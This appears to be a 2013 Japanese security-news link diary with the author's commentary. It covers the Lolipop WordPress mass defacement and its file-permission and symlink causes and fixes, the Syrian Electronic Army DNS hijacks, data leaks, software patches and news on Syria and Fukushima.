Last modified: Fri Oct 25 17:00:12 2013 +0900 (JST)
このページの情報を利用される前に、注意書きをお読みください。
》 WordPress利用サイト改ざん、レンタルサーバ「CPI」が注意呼び掛け (ITmedia, 8/30)
》 当社サービス「ロリポップ!レンタルサーバー」ユーザーサイトへの第三者による大規模攻撃について [2013/08/29 22:42 追記] (ロリポップ, 8/29)。WordPress クラックまつりの件の原因がわかってきたそうです。
[現在までに判明している被害状況]
WordPressのプラグインやテーマの脆弱性を利用し、不正なファイルがアップロードされました。
またそのファイルを利用し、wp-config.phpの設定情報が抜き出されることにより、データベースの書き換えが行われ、WordPressサイトが改ざんされました。
管理者パスワードがどうこうというレベルではありませんでしたと。
さらに [2013/08/30 19:13 追記] によると、「WordPressのプラグインやテーマの脆弱性」は起点でしかなかったもよう。
[これまでに判明している状況]
2013/08/29 22:40 時点でのご報告において、改ざん手法を「WordPressのプラグインやテーマの脆弱性を利用」として説明を行っておりましたが、その脆弱性を侵入経路として、「当社のパーミッションの設定不備を利用」されたことが原因であることを確認しております。
結局、ロリポップでWordPressの改竄が拡がった理由 (不意になにかを残すブログ, 8/30) が正解、ということなのかな。
wp-config.phpに不適切なパーミッション(たとえば444、サーバー上の全てのユーザーが読み込み可能)が設定されていて、そのファイルの場所が分かっていれば、他のユーザーがスクリプトの内容を読めてしまう。(中略) WordPressをインストールしたユーザーのうち、たった1人が脆弱なパスワードを利用していたり脆弱な古いバージョンを使っていて、ファイルのパーミッションが不適切であれば、同じサーバーのユーザーが芋づる式に二次被害を受けることになる。
(中略)
WordPressの簡単インストール機能がどのように動作するのか、現在その機能が無効化されていて確かめることが出来ないが、ほぼ同様の動作をするだろうMovableTypeの簡単インストール機能は有効で、自動的にDBアカウントとパスワードが記入される mt-config.cgi のパーミッションは644のままだった。ユーザー権限でCGIを動作させている共用サーバでは通常、400(所有者のみ読み出し可能)に変更するはずだ。
関連:
ロリポップ Wordpress大量ハッキング事件についての熊谷代表の対応 (togetter, 8/30)。これはひどい。
「ロリポップ!」で大規模なWordPressへの攻撃発覚、注意喚起した人がなぜかGMO社長に絡まれる (slashdot.jp, 8/30)
Apache symlink security issue fix/patch (whmscripts, 1/14)。/home/otheracct/public_html/wp-config.php を指すようなシンボリックリンク (public_html/fred.txt とか) をつくられるとヤバいよね、という話。 対策として、SymLinksIfOwnerMatch を指定する、.php ファイルのパーミッションを強制的に 600 にする。
From a Site Compromise to Full Root Access -- Symlinks to Root -- Part I (sucuri blog, 5/23)
……と言っている間に
[2013/08/30 23:02 追記]
(中略)
2)サーバーの設定を変更しFollowSymLinksを無効にしました。また、SymLinksIfOwnerMatchを有効にするため、ユーザーごとに.htaccess内の記述の置換を逐次行っております。
》 How Windows Phone guards against malware (Windows Phone Blog, 8/29)
》 ヤフー採用応募者の名前など15人分が流出、15年前の情報か (産経, 8/29)
》 「反対派静まりつつある」 TPP会談で日本交渉団 (中国新聞, 8/29)
甘利氏は28日、「(私は)そんなことは言っていない」と発言を否定したが、会談に同席したマレーシア政府当局者は同日、「(ムスタパ氏が指摘した)やりとりがあったことを覚えている」と確認した。
駄目すぎる……。
》 ソニー社員がインサイダー取引、ソネット完全子会社化めぐり 監視委が課徴金勧告 (ITmedia, 8/30)
》 Facebook、プライバシー約款改定へ—ユーザーデータの利用をさらに拡大 (techcrunch, 8/30)
》 Facebook、各国政府の情報請求レポートを公開、米国は1万件以上 (日経 IT Pro, 8/28)、Global Government Requests Report (Facebook, 8/27)。Japan は 1 件ですか。
》 Facebookページでファン数を簡単に増やすにはどうしたらよいか【ファンを買うのは無しで】 (More Access! More Fun!, 8/28)
》 「satisfaction guaranteed」の「ブランド捏造」と、 それに加担する国や武雄市などの自治体 (さまよう金の髭)
●2013/7/31に、satisfaction guaranteedが申請した事業が、経済産業省が公募していた、
「平成25年度 クール・ジャパン戦略推進事業補助金」の対象事業として採択されたことが発表されました。
PDF資料を見ると、satisfaction guaranteedの関連会社や、(株)JR東日本ウォータービジネスなどと組んで、
シンガポール、インドネシア、マレーシアなどに次世代型デジタル自動販売機を設置する事業とのことです。
(詳細はこちらのページから)
うへえ。SG 問題、地方自治体を越えてしまったんだ……。経産省、駄目すぎる。
》 真の自由を求めて自分たち専用のプライベートインターネットが海外で大流行中 (gigazine, 8/29)。こういう世界がまだあるんだ……。
》 しょう油さしの注ぎ口に口かざす写真を客が投稿 スシローがしょう油廃棄し容器洗浄 (ねとらぼ, 8/28)
関連:
自分の働いてる「はま寿司」の県内他店舗(愛知県)で、スシローと同様の事件発生。これに伴い、昨夜愛知県内のすべての醤油の容器と中身を捨て、新しいものに取り替えました。ふざけるなと言ってやりたい。 pic.twitter.com/UUvJEeCFf5
— やまたく@はま寿司 (@YamatakuGT) August 30, 2013
》 大学生:1日平均30分…進む本離れ 読書回帰に大学工夫 (毎日, 8/28)。ふぅむ。活字がないと生きていけない俺としては、「まったく本を読まない」人生は想像し難いものがあるのだが……。
》 「ゲン」なぜ消えた 市教委の判断急変、議会意識し焦り (朝日, 8/27)
【お詫び】ユーザ情報流出に関するお知らせ (@PAGES, 8/28)
【お詫び】ユーザ情報流出に関するお知らせ【第2報】 (@PAGES, 8/29)。「2013年2月27日午後2時54分時点で@PAGESに登録されているすべてのユーザ」のアカウント情報が漏洩。しかもパスワードは平文で漏洩。
「@PAGES」でユーザー情報流出 2月までに登録した全員のパスワードなど (ITmedia, 8/28)
「@PAGES」のユーザー情報流出は17万件超 パスワードは平文で流出 (ITmedia, 8/30)
》 Windows XPのセキュリティアップデートを年間1万9500円でマイクロソフトが実施する可能性 (gigazine, 8/29)
コンピューターワールド(CW)は、Microsoftが一部の大口顧客に対してWindows XPマシンのサポートを続ける「カスタム・サポート(CS)」と呼ばれるものを提案するだろうとリポートしています。 (中略) CSは、PC1台あたり年200ドル(約1万9500円)で提供され、4段階あるセキュリティパッチのうち最も重要度の高い「緊急」のみが自動でアップデートされるというもの。
カスタム・サポートは Windows NT や Windows 2000 のときもありましたから、XP でもあるかもしれませんね。あったとしても、あくまでエンタープライズ向けのサービスなので注意。 関連:
Microsoft Windows 製品のサポート ライフサイクルに関する FAQ: Windows NT Server 4.0 (Microsoft)
Windows 2000 カスタムサポート契約で入手可能なファイル一覧 (黒翼猫のコンピュータ日記 2nd Edition, 2012.02.17)
》 2ちゃんねるビューアの情報漏洩で自演や誹謗中傷がばれた2ちゃんねるまとめ管理人、サイトを閉鎖 (slashdot.jp, 8/29)、 「僕自身なんJをまとめる喜びはあった」管理人の所業 (はてな匿名ダイアリー, 8/28)。「この管理人は2chではアイスナインと呼ばれる有名な荒らし」ですか。
ロシアの動き
ロシアが艦船2隻を地中海に派遣、シリア情勢とは無関係と海軍 (ロイター, 8/30)
Russia sending warships to the Mediterranean: report (AFP / Google, 8/29)。121 モスクワの写真つき。 A large anti-submarine ship が何かは不明。
スラヴァ級ミサイル巡洋艦 (ウィキペディア)。121 モスクワなど。
英国政府、下院の否決によりシリア攻撃を断念 (反対 285、賛成 272)
シリア攻撃:英下院が否決 米、単独行動も (毎日, 8/30)
英、対シリア軍事行動を断念=米は方針堅持、単独介入検討 (時事, 8/30)
「原爆投下も国際法違反か」シリア化学兵器使用で米国務省に質問飛ぶ (産経, 8/29)。いい質問だ。
シリア:軍事攻撃、そのとき日本は (毎日, 8/29)
安倍首相「アサド政権は道譲るべき」 「化学兵器使用可能性高い」と非難 (産経, 8/29)
安倍晋三首相は28日午後(日本時間同日夜)、訪問先のカタール・ドーハで記者会見し、シリア情勢に関し「日本政府としてはシリアで化学兵器が使用された可能性が極めて高いと考えている。化学兵器使用はいかなる場合でも許されるものではない」と述べた。
しかし核兵器なら、「いかなる場合でも許されるものではない」わけではない模様:
クローズアップ2013:きょう広島原爆の日 核廃絶、日本二の足 (毎日, 8/6)
NPO法人「ピースデポ」(横浜市)によると、2012年の国連総会で提案された核兵器関連21決議のうち、「核兵器禁止条約」を作るための交渉開始を求める決議など4本を日本は棄権した。日本政府は、核保有国が賛同していない現状を指摘し、「核軍縮の着実な進展を達成するには現実的な措置が必要」と説明している。
また核兵器の非合法化に向けた努力を訴える共同声明が昨年5月の核拡散防止条約(NPT)再検討会議準備委員会と同10月の国連総会軍縮委員会で発表され、賛同国は前者は16カ国、後者は34カ国に上ったが、日本はいずれも署名を拒否。直ちに核兵器の禁止を求める声明が、米国の「核の傘」に依存する日本の安全保障政策と矛盾するためだ。
核の傘、矛盾またも 核不使用声明、日本署名見送り 対北朝鮮、立場難しく (朝日, 4/26)
(孤立する日本)核兵器非難の声明「署名せず」の舞台裏 (朝日, 8/3)
》 Internet Infrastructure Review (IIR) Vol.20 (IIJ, 8/30)
》 Who Wrote the Pincer Android Trojan? (Krebs on Security, 8/27)
》 Who Built the Syrian Electronic Army? (Krebs on Security, 8/28)
イプシロン機体異常なし、データ伝送のトラブルか JAXA (産経, 8/28)
イプシロン データやり取りに僅かなずれ (NHK, 8/30)
下村文部科学大臣は、30日の閣議後の会見で、ロケットに搭載されたコンピューターが機体のデータを送り出した時間より、地上側のコンピューターが受け取ろうとした時間が、0.07秒早かったためだったことを明らかにしました。
》 テレ朝「モーニングバード」福島の子供たちをただちに避難させて!踏み込んだ報道が話題に (NAVER まとめ, 8/29)。少なくとも、移転という選択肢も保障すべきだよなあ。
もっとも、除染がアレなのは、最初からわかっていた (想定済だった) ことなんですけどね。たとえば、第116回放射線審議会、ほっといても2年後に40%下がるのに除染するの? の件。 (おしどりケン・マコの脱ってみる?, 2011.12.02) にはこんな文章が:
文科省・伊藤審議官「(中略) あの、私が答えるのもあれですが、8月26日に原子力災害対策本部の方で『除染に関する緊急実施基本方針』というのを出しておりまして、まあそこではですね、今後2年後をめどに、一般公衆の被曝線量をまあ50%減少した状態を実現すると。
50%の内訳なんですけども、放射性物質などの物理的減衰、あるいは風雨など自然要因による減衰、ウェザーリング効果(風雨などによる自然要因による減衰効果)というものによって2年間でまず40%減少する。除染によって更に10%を削減して50%を達成する、というのが政府全体としての目標として掲げられてるところであります」
「2年で 50% 減」のうち 40% は自然減衰などによるもので、除染の効果は 10% のみ、というのが当初からの計画。うまくできたとしても、しょせん 10% でしかない。 最初から、その程度のものだと認識されてます。
あと、マコさんが取材した、「福島県の自治体の役人の方」のお話。
福島県の自治体の役人の方にお聞きしたのですが、福島県の自治体というのは現在、とても矛盾している、とのこと。住民の幸せを考えるのがそもそも自治体の仕事なんだけど、住民が避難して移住してしまうと、税収が減るでしょう? 自治体にとって住民はお客さまの側面があるのです。自治体の収入は、税収と行政からの予算なので、だから、多額の予算がつき、住民を移住させない除染政策にのっとってるんだ、自分の家族は避難させていても、ですって。
「避難した住民は市民、村民として扱わない」と明言した自治体の長までいらっしゃいます。
除染事業は住民のためではなく、自治体の維持のためですよ、と。
OCN認証ID・パスワードの不正利用防止に向けた セキュリティ上の脆弱性があるブロードバンドルータの利用調査および対策の実施について
脆弱性保有ブロードバンドルータの状況調査および対策について (Telecom-ISAC Japan, 2013.08.30)。Telecom-ISAC Japan が協力要請に基づき調査を実施、結果を ISP に連絡する模様。
この調査は、協力要請をいただいた会員ISPのIPアドレス帯に対して、該当製品の所在を簡易な通信コマンドで確認するものです。ネットワーク利用者に負荷をかけるものや、通信の内容を見るようなものでは一切ありません。
また、調査の実施につきましては、8月30日から順次行うことを予定しております。
June 2013 Critical Patch Update for Java SE Released で修正された欠陥 CVE-2013-2463 を狙う exploit が出回っているそうで。 修正版の Java SE 7 Update 25 は一般に公開されているけど、 同じく修正版の Java SE 6 Update 51 は一般には公開されてない (Mac 版を除く)。 ので、Windows で Java SE 6 を使っているとヤラレ放題ですよ、と。
Windows で Java SE 6 を使っている人は、 Java SE 7 に移行してください。
Opera 16 公開。Chromium 29 エンジンに移行したということなので、 Chrome Stable Channel Update で示された「25 件のセキュリティ修正」が含まれると思われ。
Windows 用 RealPlayer 16.0.2.32 以前に 2 つの欠陥 CVE-2013-4973 CVE-2013-4974。 攻略 .rmp ファイルや攻略 RealMedia ファイルを開くと任意のコードが実行される。 修正版 16.0.3.51 が提供されている。
Mac 用 RealPlayer にはこの欠陥はないが、更新版 12.0.1.1738 が用意されている。
エジプト、ムバラク元大統領を保釈 混乱続くなか (ウォール・ストリート・ジャーナル日本版, 8/23)
エジプト軍が文民統制との決別を表明、大統領への宣誓文を修正 (ロイター, 8/29)。軍隊の、軍隊による、軍隊のための軍隊。
》 汚染水漏れ:タンク監視ずさん対応 東京電力再三の指導に (毎日, 8/29)
現地に常駐する規制庁の保安検査官は、2012年7月から今年6月にかけて東電に対し、パトロール体制の強化▽監視カメラの増設▽全タンクに水位計の設置−−などを10回前後、文書や口頭で指示や指導をした。
これに対し、東電は「改善策を実施した」と規制庁に回答したが、パトロールの回数を当初の1日1回から2回に増やしただけで、人数は増やさず、規制庁の検査でタンクから漏れた汚染水の流出を防ぐせきにひびが見つかったケースもあった。また、カメラを増設したが死角が残っていた。
》 「『標的型メール攻撃』対策に向けたシステム設計ガイド」の公開 (IPA, 8/29)
》 猛威を振るう Zbot 〜 不正送金を行うマルウェアにご注意ください (日本のセキュリティチーム, 8/29)。「去年末と比べると、今年に入ってから検出数が多い傾向が続いていることから、日本の金融機関 (日本のユーザー) がメジャーなターゲットとなってきていることが分かります」。
》 NSA 方面 (PRISM、Verizon 通話記録収集等)
国連本部盗聴してますた (シュピーゲル報道)
米NSAが国連本部も盗聴、ビデオ会議の暗号解読=独誌 (ロイター, 8/26)
NSA、国連ニューヨーク本部も盗聴(Der Spiegel報道) (techcrunch, 8/26)
NSAが実行していたスパイ行為をタイムラインで並べて整理するとこうなる (gigazine, 8/28)
NSA's data reach greater than first thought, says report (ZDNet, 8/21)
》 Acrobat/Adobe Reader が強制終了する問題について (Adobe, 8/28)。強制終了された人は、素直にアップデートしませう。
》 当社サービス「ロリポップ!レンタルサーバー」ユーザーサイトへの第三者による大規模攻撃について (ロリポップ, 8/29)。WordPress クラックまつりの件つづき。
関連なのかな: レンタルサーバ向けにWebサーバの保護を提供開始 (エフセキュアブログ, 8/29)。ロリポップで「エフセキュア Linux セキュリティ」を利用できる。
》 人気動画ダウンローダーにDDoS攻撃用コンポーネント - 国内利用者も多数 (security-next.com, 8/26)。関連:
Orbital Decay: the dark side of a popular file downloading tool (ESET, 8/21)。4.1.1.14 (2012.12.25) から 4.1.1.15 (2013.01.10) の間のどこかで、悪質コンポーネントが orbitdm.exe に入り込んだそうで。 Softpedia など主要なダウンロードサイトからは削除されたようだけど、 本家 ではいまだ配布され続けている。
》 日本の全エンジニアに捧ぐ!現在公開されているテスト用ダミーデータ一覧 (find-job.net, 8/28)。クレジットカード番号、ドメイン名、IP アドレス、顧客情報、画像。RFC6890: Special-Purpose IP Address Registries というのがあるのですか。
》 Flash Player Security with Windows 8 and Internet Explorer 10 (Adobe, 8/28)
》 電機業界では不可避の「ブルーライト問題」、医師やデバイス研究者を集めた国際会議が開催 (日経 Tech On, 8/27)
ブルーライトを規制する立場からの発表としては、欧州のCIEから、LEDランプのブルーライトに関して近くクラス分けを実施するとの報告があった。登壇者に講演後、「スマートフォンやテレビに関しても同様の取り組みをしていくのか?」とたずねたところ、「検討中」との回答だった。まずは急速に普及が進むLED照明を対象とし、今後は電子機器全般にわたってブルーライトの規制に関する検討を進めていく考えのようだ。
ふむん……。
後日、NHK大阪がブルーライトに関する特集番組を放映していた。それによると、ドイツ工業規格(DIN)はLED照明のブルーライトに関するガイドラインを既に打ち出しているという。そのガイドラインに基づいて、大学の教室で昼間はブルーライトを強調し、夜は減光するという実験が行われた様子が紹介されていた。
6/7 の「かんさい熱視線」ですね。
関連:
"ブルーライト" 健康への影響は? (NHK, 6/1)
》 Facebookを使えば使うほど人生に満足できなくなる原因が研究で明らかに (gigazine, 8/27)
》 Patch Management Guidance from NIST (SANS ISC, 8/27)。NIST Special Publication 800-40 Revision 3, Guide to Enterprise Patch Management Technologies。
軍事オプション
西側諸国がシリア軍事介入の可能性、米国「用意整った」 (ロイター, 8/28)
焦点:米国の対シリア攻撃は小規模か、イランけん制目的も (ロイター, 8/28)
シリア市民に交錯する期待と不安、軍事介入めぐり首都緊迫化 (ロイター, 8/28)
コラム:米国がシリアに軍事介入する本当の理由 (ロイター, 8/28)。 国際政治学者イアン・ブレマー氏の見解。
米英仏がシリア軍事介入の準備、露は反発 (CNN, 8/28)
シリア政権軍が首都拠点から大半が退避か、軍事介入に備え (ロイター, 8/29)
オバマ米大統領、シリア軍事攻撃は「まだ決定せず」 (ロイター, 8/29)
米大統領がシリア攻撃の長期化回避を強調、時期決定難しく (ロイター, 8/29)
イスラエルでガスマスク需要急増、シリア情勢めぐり警戒強化 (ロイター, 8/29)
対シリア軍事介入への動き加速 イランがけん制 (CNN, 8/29)
イラン、シリアへ軍事介入すればイスラエルへ報復と脅し (ウォール・ストリート・ジャーナル日本版, 8/29)
サウジ、トルコは攻撃支持 イラン反発、イスラエルは牽制 周辺国の思惑交錯 (産経, 8/28)
安保理、武力行使容認決議案採択に至らず 中露が反対 (産経, 8/29)
UPDATE 1-〔情報BOX〕-米国がシリアへの軍事介入で使用する可能性のある兵器 (ロイター, 8/29)
シリア 北朝鮮からミサイル購入 (NHK, 8/29)。「射程100キロ余りの短距離ミサイルおよそ40基」。
シリアへの軍事行動開始目前 限定的な攻撃の目的は (海国防衛ジャーナル, 8/28)
欧州や中東に戦闘機や長距離攻撃機が展開しているものの、攻撃計画はあくまでも海上からの巡航ミサイルによるものと限定されているのは、シリアが中東でも最強クラスの防空戦力を持っており、航空機を用いることがためらわれている、という側面もあります。
英米仏によるシリア軍事介入「合理性ない」 一般市民に多数の死者が出る可能性指摘 〜岩上安身による青山弘之氏インタビュー (IWJ, 8/28)。しかしいまさら「一般市民に多数の死者が出る可能性」と言われてもなあ。既にさんざん一般市民に多数の死者が出ている (現在進行形) なわけで。
シリア爆撃への期待 (ワールド&インテリジェンス, 8/28)
8/21 の化学兵器によると疑われる攻撃
シリア:化学兵器による攻撃の疑い 政府は国連調査団に即時のアクセスを与えるべき (ヒューマン・ライツ・ウォッチ, 8/21)
目撃者がヒューマン・ライツ・ウォッチに語ったところによると、いくつかの街の住民が、ダマスカスの政府管理区域から発射されたとみられるミサイルに搭載されていた化学兵器によって、被害を受けた模様。被害が及んだ街には、ザマルカ、アインタルマ、 およびモアダミヤが含まれる。
<シリア>「政府軍が化学兵器使用」と、地元目撃者は証言 (アジアプレス, 8/29)
この攻撃を誰がやったのか、との質問に、ムハマッドさんは、 「政府軍だと思う。理由として、被害が出た町は、すべて自由シリア軍の支配地域だった。町に多くの自由シリア軍兵士たちがいたから、彼らを狙ったのだろう」と答えた。
「アサドは愚かでない」、シリアのクルド人組織が毒ガス使用に疑義 (ロイター, 8/28)。「同国最大のクルド人組織「民主統一党」(PYD)のサレハ・ムスリム代表」の見解。
PYDはこれまで、アサド政権側と反体制派側の両者と衝突してきたが、別のクルド人組織からはPYDが政権に近い立場にあるとの批判の声も上がっている。
シリア政府軍が化学兵器を使用する理由 (ワールド&インテリジェンス, 8/23)、 マーヘル・アサドの暴走の可能性も? (ワールド&インテリジェンス, 8/29)。黒井文太郎氏の見解。
Exclusive: Intercepted Calls Prove Syrian Army Used Nerve Gas, U.S. Spies Say (Foreign Policy, 8/27)。スパイ大作戦。
American intelligence analysts are certain that chemical weapons were used on Aug. 21 -- the captured phone calls, combined with local doctors' accounts and video documentation of the tragedy -- are considered proof positive. That is why the U.S. government, from the president on down, has been unequivocal in its declarations that the Syrian military gassed thousands of civilians in the East Ghouta region.
However, U.S. spy services still have not acquired the evidence traditionally considered to be the gold standard in chemical weapons cases: soil, blood, and other environmental samples that test positive for reactions with nerve agent. That's the kind of proof that America and its allies processed from earlier, small-scale attacks that the White House described in equivocal tones, and declined to muster a military response to in retaliation.
Israeli intelligence 'intercepted Syrian regime talk about chemical attack' (Guardian, 8/28)
シリア化学兵器:国連特別代表「1000人以上死亡」示唆 (毎日, 8/29)。ブラヒミ国連・アラブ連盟合同特別代表 (ブラヒミ氏って、まだいたんだ……)。
アサド氏護衛殺害の報復か 化学兵器疑惑で英紙報道 (産経, 8/29)。Times の報道。
シリア:内戦下のMSF医療援助——国内での活動開始から1年 (MSF, 2013.08)
》 WordPress クラックまつり開催中 (主にロリポップ方面?)
【速報】ロリポップサーバーのWordpressにハッキング、既に4600件以上!? (NAVER まとめ, 8/28)
ロリポップのWordPressサイトが次々と『Krad Xin』にハッキングされている様子 (room402, 8/28)
ロリポップさんの案内
【重要】WordPressをご利用のお客様へ (ロリポップ, 8/28)
WordPress のログイン ID とパスワードに脆弱な文字列を使用している場合に、管理画面へ不正にログインされる事例を多数確認しております。
不正利用を防ぐために、下記2つの対策を必ず行ってください。
そのあとに ID とパスワードは強固なものつけてね、wp-login.phpへのアクセス制限を実施してねと書かれてるんだけど、その前に admin ユーザの変更方法を具体的に示さないと駄目なんじゃ……。 WordPressのadminユーザーを変更(削除)する方法。乗っ取られる前にセキュリティ強化! (ushigyu.net, 4/13) みたいな話。 WordPressのadminユーザー名を変更するプラグイン なんてのもあるそうですが。
関連
ロリポップでWordPressを使っていてWAFの誤検知が出るときの対処法 (HASH コンサルティング, 2012.12.30)
》 シリア電子軍、NYTimes や twitter などにドメイン名ハイジャック攻撃を実施。 レジストラである Melbourne It を攻略。 実際に NS を変更されたのは NYTimes.com, Twitter.co.uk, Twimg.com, huffingtonpost.co.uk でいいのかなあ。(違ったようで)
Syrian Electronic Army Apparently Hacks DNS Records Of Twitter, NYT Through Registrar Melbourne IT (techcrunch, 8/27)
Matt Johansen @mattjay さんのツイート。変更時の NYTimes.com の NS レコードがわかる:
NYTimes DNS is compromised. Pointing to Syrian Electronic Army domain. http://t.co/wfJugHQ155 pic.twitter.com/Vhf35kuQAP
— Matt Johansen (@mattjay) August 27, 2013
SyrianElectronicArmy @Official_SEA16 さんのツイート:
Media is going down.... | http://t.co/Gd1zB70v0g | http://t.co/8NUe7Cs2jm | http://t.co/QDdNdEuuVX | http://t.co/W9nmxo95PQ
— SyrianElectronicArmy (@Official_SEA16) August 27, 2013
http://t.co/uBfzQwDEws #SEA #SyrianElectronicArmy pic.twitter.com/YKlbRBm1hg
— SyrianElectronicArmy (@Official_SEA16) August 28, 2013
http://t.co/wDO83RU2s3 #SEA #SyrianElectronicArmy pic.twitter.com/NPDZv4BNzv
— SyrianElectronicArmy (@Official_SEA16) August 28, 2013
http://t.co/kiBXOnqWSc #SEA #SyrianElectronicArmy pic.twitter.com/v5mwsA4QyC
— SyrianElectronicArmy (@Official_SEA16) August 28, 2013
http://t.co/RzR3KZFOTT #SEA #SyrianElectronicArmy pic.twitter.com/jtdiZQrHD5
— SyrianElectronicArmy (@Official_SEA16) August 28, 2013
Twitter, NYTimes and Huff Po Whois and DNS records altered, Syrian Electronic Army takes responsibility (The Next Web, 8/27)
Twitter、シリア電子軍から攻撃を受けた可能性--The New York Timesもアクセス不能に (CNET, 8/28)
Twitterがダウン 「シリア電子軍」が犯行声明をツイート (ITmedia, 8/28)
twitter service issue (twitter, 8/27)
Several domains including New York Times and Twitter attacked by Syrian Electronic Army (AlienVault Labs, 8/27)
「Syrian Electronic Army」を自称する者によるドメイン名乗っ取り (ゆかりんのーと, 8/28)
Yasuhiro Morishita @OrangeMorishita さんのツイート:
syrianelectronicarmy .comが.com からの委任切られた件(WHOISは残ってるのでたぶん強制的)と、委任先だった NAME .COM のサーバーがns[12] .syrianelectronicarmy .comに127.0.0.1を返すのは既出?
— Yasuhiro Morishita (@OrangeMorishita) August 28, 2013
Syrian Electronic Army brings down Twitter and The New York Times through domain name provider hack (Sophos, 8/28)
Note: As of 2013-08-27T23:25Z, Twitter's Indian domain name (twitter.co.in) is still under the control of the Syrian Electronic Army. It is advisable to use twitter.com until Twitter regains control.
Melbourne IT Blog Hacked and Defaced by Syrian Electronic Army (Sofpedia, 8/28)。だめだこりゃ。
で、//platform.twitter.com/widgets.js なんてものを読み込んでいるこのサイトもかなりアレかもなわけですね……。
》 高血圧薬ディオバン問題、難航する真相解明 検察、公取委の出方は? 郷原信郎弁護士に聞く (朝日, 8/26)
》 岡山県警:同僚女性警官にわいせつの疑い…巡査部長を逮捕 (毎日, 8/7)。 8/27 に起訴されたそうで。
》 クラウドソーシング業界を揺るがした“大炎上”の一部始終 (CNET, 8/28)。関連:
ランサーズが不利な記事掲載でThe Startupにクレームを入れて黒煙が上がる (やまもといちろう Blog, 8/20)
クラウドワークスがThe Startup梅木雄平さんを真っ二つにして一件落着 (やまもといちろう Blog, 8/23)
クラウドワークス社長にケンカを売るマモノ氏(@mamononews)がやたら偉そうな件 (NAVER まとめ, 8/26)
星の梅木雄平さま、警察にいく (やまもといちろう Blog, 8/27)
【悲報】切込隊長山本一郎「mamononewsことGMOの世永玲生の追求で梅木って奴が警察に駆け込んだ」 (2ch, 8/27)
TechWaveからお詫び 編集長・増田真樹 @maskin (TechWave, 8/28)
》 「増え続けるデータと攻撃者が大きな脅威に」サイバー犯罪やセキュリティで警察庁幹部らが指摘 (日経 IT Pro, 8/27)
》 8/25 毎日本紙の「ストーリー:カメラ捜査、最前線」という記事が興味深かった。Web にはないみたい。
東京・渋谷のラブホテル街。梅雨入りしたばかりだった。人通りが少ない午前中の路地に、2人の男の姿があった。パソコン(PC)など約10キロの機材が入ったバッグを手に、林立するホテルを注意深く見上げて歩く。
(中略)
午後、やっと録画されたカメラが見つかった。捜査員はPCをバッグから取り出す。目当てはPCに保存してある269社、1517機種の防犯カメラのマニュアルだ。そこから、目の前にあるカメラの機種を特定し、録画記録装置のデータを抜き取る方法を確認するためだ。狭い事務所での作業。こめかみから汗が滴り落ちる。
1人の捜査員が携帯電話を手にカメラの前に立った。時報を合図に手を挙げるその姿を、もう一人がモニター越しに見つめ、表示時間との誤差を確認する。「17時間57分31秒」も遅れていた。誤差が分かれば、逆算して当時の画像を見ればいい。だがその後、時計が事件後にリセットされた可能性が浮上した。「あやふやすぎる」。2人は作業を中断した。
地道な作業だなあ。
実際に、犯罪捜査の強力な助っ人のはずの防犯カメラが、あってはならない冤罪(えんざい)を起こしたケースも明らかになっている。今年4月、堺市の男性会社員が給油カードを盗んだとして逮捕され85日間にわたって拘束された。決め手は防犯カメラの映像だった。ところが、映像の時間表示は実際の時刻と違っていたのだ。
小山さんは指摘する。
「カメラ捜査に限らず、時計は合っていない前提で確認するのが基本。カメラを追う場合、起点の画像の時間が合っていないと、次の時間帯もずれて線がつながらない。時計を疑うのは常識です」
大阪府警北堺署と大阪地検堺支部は、基本ができておらず、常識もなかったと。 「小山さん」は、警視庁刑事部・捜査支援分析センターの小山由夫所長。
誤認逮捕、起訴を取り消し 大阪府警が男性に謝罪へ (日経, 7/30)
デタラメ捜査…冤罪暴いた新人弁護士、推理小説さながらの「独自調査」 (産経 / livedoor, 8/3)
赤堀弁護士は「ETC履歴や販売記録の収集は本来、警察や検察がやるべきことだが、その職責すら果たしていなかった。司法修習生でも考えられないようなミスだ」と話す。
》 IIJ、企業向けオンラインストレージに遠隔地DRオプションを追加 (日経 IT Pro, 8/27)
IIJが提供する東日本地域のプライマリーサイトにあるDOXのファイルデータを、西日本地域に設置したバックアップサイトに1時間ごとにコピーする。
》 カルチュア・コンビニエンス・クラブ増田宗昭社長「企画という生き方」あすか会議2013 (globis.jp, 8/27)。武雄図書館への言及も。
今は行政の方があちこちから毎日見学にいらしていて、「うちでもやってくれ」「見に来てくれ」と、行列をつくっている状態だ。僕らがやるとコストが下がるというのもある。すべてセルフPOSだし、実際には本のレンタル屋だ。要するに「図書館なんてものはない」と(会場笑)。名前は図書館だが、本のレンタル屋だ。
CCC 的にはそういう意識である、と。
今回は Windows Vista、Server 2008、7、Embedded Standard 7、Server 2008 R2 用の 2861855 更新プログラムを公開。「リモート デスクトップ プロトコルのネットワーク レベル認証に関する追加の多重防御の対策を実現する更新プログラム」としか書かれていない。
「マイクロソフトはこのアドバイザリを通じて追加の更新プログラムを継続的に発表」 するそうなので、そのうちつづきがある模様。
Windows Vista / Server 2008 以降向け、MD5 さようなら計画 (一部例外あり: KB 2862973 参照)。人柱になりたい人は、ダウンロードセンターか Microsoft Update カタログから入手して手動で適用。 事前に 2862966 更新プログラムを適用する必要あり。 Windows RT 用はまだない。 2014 年 2 月 12 日に Microsoft Update で配布される予定。
こっちの方がまとまってた: セキュリティ アドバイザリ 2862973 〜 ルート証明書プログラムにおける MD5ハッシュの利用制限 (日本のセキュリティチーム, 2013.08.14)。この時点ではダウンロードセンターだけだった。今日から Microsoft Update カタログでも入手できるようになった。
マイクロソフト セキュリティ アドバイザリ (2862973) マイクロソフト ルート証明書プログラムでの MD5 ハッシュ アルゴリズム廃止用の更新プログラム が 2013.10.09 付で更新された。
V1.2 (2013/10/09):この更新プログラムが Windows 8.1、Windows Server 2012 R2、および Windows RT 8.1 に適用されないことを明示しました。また、すべての該当オペレーティング システムに関して、管理者およびエンタープライズのインストールの場合は、MD5 ハッシュ付きの証明書が環境に存在するかどうかを評価して、マイクロソフトが 2014 年 2 月に公開する予定である更新プログラムが広く配布される前にこれらの証明書を再発行する必要があることを改めてお知らせしました。
Windows 8.1 には最初から入っているのかな。
MS13-061 - 緊急: Microsoft Exchange Server の脆弱性により、リモートでコードが実行される (2876063) の Exchange 2013 用の更新プログラム 2874216 が再リリースされた。
2013 年 8 月 14 日にリリースされたオリジナル版の更新プログラムには、Exchange Server でサーバー上のメールのインデックス処理が停止する問題があり、この再リリース版ではその問題を解決しています。
